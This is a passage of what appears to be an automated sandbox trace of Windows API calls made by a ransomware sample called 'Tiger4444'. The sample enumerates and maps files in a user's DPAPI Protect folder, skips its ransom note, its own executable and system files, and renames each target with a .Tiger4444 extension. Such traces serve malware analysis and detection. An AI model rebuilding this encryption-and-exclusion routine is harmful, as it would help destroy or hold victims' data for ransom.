returned 4 [0052.386] lstrcmpiW (lpString1="e557", lpString2=".sys") returned 1 [0052.386] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\20cac00a-26e8-46c6-ab84-90a52b05e557" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1051304884-625712362-2192934891-1000\\20cac00a-26e8-46c6-ab84-90a52b05e557"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0052.386] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0052.386] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14383931751) returned 1 [0052.386] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=468) returned 1 [0052.386] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89680 [0052.386] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71950 [0052.386] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4e0, lpName=0x0) returned 0x2a4 [0052.389] MapViewOfFile (hFileMappingObject=0x2a4, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4e0) returned 0xbe0000 [0052.389] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc8d0f8 [0052.389] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0052.389] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8d0f8 | out: hHeap=0xc50000) returned 1 [0052.389] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0052.390] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0052.390] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0052.390] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0052.390] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0052.390] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14384293177) returned 1 [0052.390] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89680 | out: hHeap=0xc50000) returned 1 [0052.390] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71950 | out: hHeap=0xc50000) returned 1 [0052.390] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.390] CloseHandle (hObject=0x2a4) returned 1 [0052.390] CloseHandle (hObject=0x2c8) returned 1 [0052.390] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\20cac00a-26e8-46c6-ab84-90a52b05e557.Tiger4444") returned 142 [0052.390] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\20cac00a-26e8-46c6-ab84-90a52b05e557" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1051304884-625712362-2192934891-1000\\20cac00a-26e8-46c6-ab84-90a52b05e557"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\20cac00a-26e8-46c6-ab84-90a52b05e557.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1051304884-625712362-2192934891-1000\\20cac00a-26e8-46c6-ab84-90a52b05e557.tiger4444"), dwFlags=0x1) returned 1 [0052.391] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd20187d7, ftCreationTime.dwHighDateTime=0x1d47c31, ftLastAccessTime.dwLowDateTime=0xd20187d7, ftLastAccessTime.dwHighDateTime=0x1d47c31, ftLastWriteTime.dwLowDateTime=0x2ba69b91, ftLastWriteTime.dwHighDateTime=0x1d4d5d0, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1", cAlternateFileName="5C4D6E~1")) returned 1 [0052.391] lstrcmpiW (lpString1="5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.391] lstrcmpiW (lpString1="5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.391] lstrcmpiW (lpString1="5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1", lpString2="Tiger4444.exe") returned -1 [0052.391] lstrcmpiW (lpString1="5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1", lpString2=".") returned 1 [0052.391] lstrcmpiW (lpString1="5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1", lpString2="..") returned 1 [0052.391] lstrcmpiW (lpString1="5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1", lpString2="windows") returned -1 [0052.391] lstrcmpiW (lpString1="5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1", lpString2="bootmgr") returned -1 [0052.391] lstrcmpiW (lpString1="5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1", lpString2="pagefile.sys") returned -1 [0052.391] lstrcmpiW (lpString1="5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1", lpString2="boot") returned -1 [0052.391] lstrcmpiW (lpString1="5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1", lpString2="ids.txt") returned -1 [0052.391] lstrcmpiW (lpString1="5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1", lpString2="NTUSER.DAT") returned -1 [0052.391] lstrcpyW (in: lpString1=0x30aeb68, lpString2="5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1" | out: lpString1="5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1") returned="5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1" [0052.391] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1", dwFileAttributes=0x22) returned 1 [0052.392] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1", dwFileAttributes=0x6) returned 1 [0052.392] lstrlenW (lpString="5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1") returned 36 [0052.392] lstrlenW (lpString="Tiger4444") returned 9 [0052.392] lstrcmpiW (lpString1="debf6bfd1", lpString2="Tiger4444") returned -1 [0052.392] lstrlenW (lpString=".dll") returned 4 [0052.392] lstrcmpiW (lpString1="bfd1", lpString2=".dll") returned 1 [0052.392] lstrlenW (lpString=".lnk") returned 4 [0052.392] lstrcmpiW (lpString1="bfd1", lpString2=".lnk") returned 1 [0052.392] lstrlenW (lpString=".ini") returned 4 [0052.392] lstrcmpiW (lpString1="bfd1", lpString2=".ini") returned 1 [0052.392] lstrlenW (lpString=".sys") returned 4 [0052.392] lstrcmpiW (lpString1="bfd1", lpString2=".sys") returned 1 [0052.392] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1051304884-625712362-2192934891-1000\\5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0052.392] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0052.392] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14384530758) returned 1 [0052.392] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=468) returned 1 [0052.392] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc899c8 [0052.392] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71b70 [0052.392] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4e0, lpName=0x0) returned 0x2a4 [0052.394] MapViewOfFile (hFileMappingObject=0x2a4, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4e0) returned 0xbe0000 [0052.395] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc8d0f8 [0052.395] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0052.395] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8d0f8 | out: hHeap=0xc50000) returned 1 [0052.395] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0052.395] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0052.395] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0052.395] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0052.395] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0052.395] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14384802545) returned 1 [0052.395] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc899c8 | out: hHeap=0xc50000) returned 1 [0052.395] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71b70 | out: hHeap=0xc50000) returned 1 [0052.395] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.395] CloseHandle (hObject=0x2a4) returned 1 [0052.395] CloseHandle (hObject=0x2c8) returned 1 [0052.395] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1.Tiger4444") returned 142 [0052.395] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1051304884-625712362-2192934891-1000\\5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1051304884-625712362-2192934891-1000\\5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1.tiger4444"), dwFlags=0x1) returned 1 [0052.396] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3a6118fa, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x3a6118fa, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x2bb4ea93, ftLastWriteTime.dwHighDateTime=0x1d4d5d0, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7a70842e-d6a2-46c1-966c-384a4ef9d347", cAlternateFileName="7A7084~1")) returned 1 [0052.396] lstrcmpiW (lpString1="7a70842e-d6a2-46c1-966c-384a4ef9d347", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.396] lstrcmpiW (lpString1="7a70842e-d6a2-46c1-966c-384a4ef9d347", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.396] lstrcmpiW (lpString1="7a70842e-d6a2-46c1-966c-384a4ef9d347", lpString2="Tiger4444.exe") returned -1 [0052.396] lstrcmpiW (lpString1="7a70842e-d6a2-46c1-966c-384a4ef9d347", lpString2=".") returned 1 [0052.396] lstrcmpiW (lpString1="7a70842e-d6a2-46c1-966c-384a4ef9d347", lpString2="..") returned 1 [0052.396] lstrcmpiW (lpString1="7a70842e-d6a2-46c1-966c-384a4ef9d347", lpString2="windows") returned -1 [0052.396] lstrcmpiW (lpString1="7a70842e-d6a2-46c1-966c-384a4ef9d347", lpString2="bootmgr") returned -1 [0052.396] lstrcmpiW (lpString1="7a70842e-d6a2-46c1-966c-384a4ef9d347", lpString2="pagefile.sys") returned -1 [0052.396] lstrcmpiW (lpString1="7a70842e-d6a2-46c1-966c-384a4ef9d347", lpString2="boot") returned -1 [0052.396] lstrcmpiW (lpString1="7a70842e-d6a2-46c1-966c-384a4ef9d347", lpString2="ids.txt") returned -1 [0052.396] lstrcmpiW (lpString1="7a70842e-d6a2-46c1-966c-384a4ef9d347", lpString2="NTUSER.DAT") returned -1 [0052.396] lstrcpyW (in: lpString1=0x30aeb68, lpString2="7a70842e-d6a2-46c1-966c-384a4ef9d347" | out: lpString1="7a70842e-d6a2-46c1-966c-384a4ef9d347") returned="7a70842e-d6a2-46c1-966c-384a4ef9d347" [0052.396] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\7a70842e-d6a2-46c1-966c-384a4ef9d347", dwFileAttributes=0x22) returned 1 [0052.397] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\7a70842e-d6a2-46c1-966c-384a4ef9d347", dwFileAttributes=0x6) returned 1 [0052.397] lstrlenW (lpString="7a70842e-d6a2-46c1-966c-384a4ef9d347") returned 36 [0052.397] lstrlenW (lpString="Tiger4444") returned 9 [0052.397] lstrcmpiW (lpString1="a4ef9d347", lpString2="Tiger4444") returned -1 [0052.397] lstrlenW (lpString=".dll") returned 4 [0052.397] lstrcmpiW (lpString1="d347", lpString2=".dll") returned 1 [0052.397] lstrlenW (lpString=".lnk") returned 4 [0052.397] lstrcmpiW (lpString1="d347", lpString2=".lnk") returned 1 [0052.397] lstrlenW (lpString=".ini") returned 4 [0052.397] lstrcmpiW (lpString1="d347", lpString2=".ini") returned 1 [0052.397] lstrlenW (lpString=".sys") returned 4 [0052.397] lstrcmpiW (lpString1="d347", lpString2=".sys") returned 1 [0052.397] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\7a70842e-d6a2-46c1-966c-384a4ef9d347" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1051304884-625712362-2192934891-1000\\7a70842e-d6a2-46c1-966c-384a4ef9d347"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0052.398] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0052.398] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14385074224) returned 1 [0052.398] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=468) returned 1 [0052.398] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc899c8 [0052.398] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ea0 [0052.398] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4e0, lpName=0x0) returned 0x2a4 [0052.399] MapViewOfFile (hFileMappingObject=0x2a4, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4e0) returned 0xbe0000 [0052.399] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc8d0f8 [0052.399] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0052.400] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8d0f8 | out: hHeap=0xc50000) returned 1 [0052.400] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0052.400] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0052.400] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0052.400] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0052.400] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0052.400] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14385297912) returned 1 [0052.400] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc899c8 | out: hHeap=0xc50000) returned 1 [0052.400] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ea0 | out: hHeap=0xc50000) returned 1 [0052.400] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.400] CloseHandle (hObject=0x2a4) returned 1 [0052.400] CloseHandle (hObject=0x2c8) returned 1 [0052.400] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\7a70842e-d6a2-46c1-966c-384a4ef9d347.Tiger4444") returned 142 [0052.400] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\7a70842e-d6a2-46c1-966c-384a4ef9d347" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1051304884-625712362-2192934891-1000\\7a70842e-d6a2-46c1-966c-384a4ef9d347"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\7a70842e-d6a2-46c1-966c-384a4ef9d347.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1051304884-625712362-2192934891-1000\\7a70842e-d6a2-46c1-966c-384a4ef9d347.tiger4444"), dwFlags=0x1) returned 1 [0052.401] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5c020c86, ftCreationTime.dwHighDateTime=0x1d4d5d3, ftLastAccessTime.dwLowDateTime=0x5c020c86, ftLastAccessTime.dwHighDateTime=0x1d4d5d3, ftLastWriteTime.dwLowDateTime=0x5c0df81b, ftLastWriteTime.dwHighDateTime=0x1d4d5d3, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f", cAlternateFileName="B1334A~1")) returned 1 [0052.401] lstrcmpiW (lpString1="b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.401] lstrcmpiW (lpString1="b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.401] lstrcmpiW (lpString1="b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f", lpString2="Tiger4444.exe") returned -1 [0052.401] lstrcmpiW (lpString1="b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f", lpString2=".") returned 1 [0052.401] lstrcmpiW (lpString1="b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f", lpString2="..") returned 1 [0052.401] lstrcmpiW (lpString1="b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f", lpString2="windows") returned -1 [0052.401] lstrcmpiW (lpString1="b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f", lpString2="bootmgr") returned -1 [0052.401] lstrcmpiW (lpString1="b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f", lpString2="pagefile.sys") returned -1 [0052.401] lstrcmpiW (lpString1="b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f", lpString2="boot") returned -1 [0052.401] lstrcmpiW (lpString1="b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f", lpString2="ids.txt") returned -1 [0052.401] lstrcmpiW (lpString1="b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f", lpString2="NTUSER.DAT") returned -1 [0052.401] lstrcpyW (in: lpString1=0x30aeb68, lpString2="b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f" | out: lpString1="b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f") returned="b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f" [0052.401] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f", dwFileAttributes=0x22) returned 1 [0052.402] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f", dwFileAttributes=0x6) returned 1 [0052.402] lstrlenW (lpString="b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f") returned 36 [0052.402] lstrlenW (lpString="Tiger4444") returned 9 [0052.402] lstrcmpiW (lpString1="6e1e6ed9f", lpString2="Tiger4444") returned -1 [0052.402] lstrlenW (lpString=".dll") returned 4 [0052.402] lstrcmpiW (lpString1="ed9f", lpString2=".dll") returned 1 [0052.402] lstrlenW (lpString=".lnk") returned 4 [0052.402] lstrcmpiW (lpString1="ed9f", lpString2=".lnk") returned 1 [0052.402] lstrlenW (lpString=".ini") returned 4 [0052.402] lstrcmpiW (lpString1="ed9f", lpString2=".ini") returned 1 [0052.402] lstrlenW (lpString=".sys") returned 4 [0052.402] lstrcmpiW (lpString1="ed9f", lpString2=".sys") returned 1 [0052.402] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1051304884-625712362-2192934891-1000\\b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0052.402] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0052.402] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14385526301) returned 1 [0052.402] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=468) returned 1 [0052.402] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89680 [0052.402] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0052.402] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4e0, lpName=0x0) returned 0x2a4 [0052.404] MapViewOfFile (hFileMappingObject=0x2a4, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4e0) returned 0xbe0000 [0052.404] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc8d0f8 [0052.404] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0052.405] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8d0f8 | out: hHeap=0xc50000) returned 1 [0052.405] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0052.405] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0052.405] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0052.405] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0052.405] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0052.405] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14385798045) returned 1 [0052.405] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89680 | out: hHeap=0xc50000) returned 1 [0052.405] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0052.405] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0052.405] CloseHandle (hObject=0x2a4) returned 1 [0052.405] CloseHandle (hObject=0x2c8) returned 1 [0052.405] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f.Tiger4444") returned 142 [0052.405] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1051304884-625712362-2192934891-1000\\b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1051304884-625712362-2192934891-1000\\b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f.tiger4444"), dwFlags=0x1) returned 1 [0052.406] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1383bcc, ftCreationTime.dwHighDateTime=0x1d41dc4, ftLastAccessTime.dwLowDateTime=0x1383bcc, ftLastAccessTime.dwHighDateTime=0x1d41dc4, ftLastWriteTime.dwLowDateTime=0x2bbe719f, ftLastWriteTime.dwHighDateTime=0x1d4d5d0, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ddbd6a25-732f-4175-9949-5cdf51e0bd09", cAlternateFileName="DDBD6A~1")) returned 1 [0052.406] lstrcmpiW (lpString1="ddbd6a25-732f-4175-9949-5cdf51e0bd09", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.406] lstrcmpiW (lpString1="ddbd6a25-732f-4175-9949-5cdf51e0bd09", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.406] lstrcmpiW 